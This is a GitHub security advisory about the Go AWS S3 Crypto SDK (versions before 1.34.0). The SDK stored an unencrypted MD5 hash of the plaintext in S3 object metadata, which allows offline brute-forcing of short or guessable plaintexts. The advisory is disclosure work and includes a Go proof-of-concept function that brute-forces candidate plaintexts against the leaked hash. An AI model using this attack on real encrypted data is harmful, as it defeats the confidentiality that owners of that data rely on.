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Unencrypted md5 plaintext hash in metadata in AWS S3 Crypto SDK for golang

Moderate severity GitHub Reviewed Published Aug 10, 2020 in google/security-research • Updated Oct 2, 2023


gomod (Go)

Affected versions

< 1.34.0

Patched versions




The golang AWS S3 Crypto SDK was impacted by an issue that can result in loss of confidentiality. An attacker with read access to an encrypted S3 bucket was able to recover the plaintext without accessing the encryption key.

Specific Go Packages Affected


The vulnerability poses insider risks/privilege escalation risks, circumventing KMS controls for stored data.


The issue has been fully mitigated by AWS as of Aug. 5th by disallowing the header in question.

The S3 crypto library tries to store an unencrypted hash of the plaintext alongside the ciphertext as a metadata field. This hash can be used to brute force the plaintext in an offline attack, if the hash is readable to the attacker. In order to be impacted by this issue, the attacker has to be able to guess the plaintext as a whole. The attack is theoretically valid if the plaintext entropy is below the key size, i.e. if it is easier to brute force the plaintext instead of the key itself, but practically feasible only for short plaintexts or plaintexts otherwise accessible to the attacker in order to create a rainbow table.

The issue has been fixed server-side by AWS as of Aug 5th, by blocking the related metadata field. No S3 objects are affected anymore.


The header in question is no longer served by AWS, making this attack fully mitigated as of Aug. 5th.

Proof of concept

A Proof of concept is available in a separate github repository, this particular issue can be found at here:

func HashExploit(bucket string, key string, input *OfflineAttackInput) (string, error) {
	_, header, err := input.S3Mock.GetObjectDirect(bucket, key)
	length, err := strconv.Atoi(header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Length"))
	plaintextMd5 := header.Get("X-Amz-Meta-X-Amz-Unencrypted-Content-Md5")
	blocks := length / 16
	possiblePlaintextNum := 1
	segNum := len(input.PossiblePlaintextSegments)
	for i := 0; i < blocks; i++ {
		possiblePlaintextNum *= segNum
	for i := 0; i < possiblePlaintextNum; i++ {
		w := i
		guess := ""
		for j := 0; j < blocks; j++ {
			guess += input.PossiblePlaintextSegments[w%segNum]
			w /= segNum
		guessMd5 := md5.Sum([]byte(guess))
		if plaintextMd5 == base64.StdEncoding.EncodeToString(guessMd5[:]) {
			return guess, nil
	return "", fmt.Errorf("No plaintext found!")

The PoC will only work on old versions of the library, as the hash has been removed from being calculated as well.


@u269c u269c published to google/security-research Aug 10, 2020
Reviewed May 24, 2021
Published to the GitHub Advisory Database Feb 11, 2022
Last updated Oct 2, 2023






No known CVE



Source code


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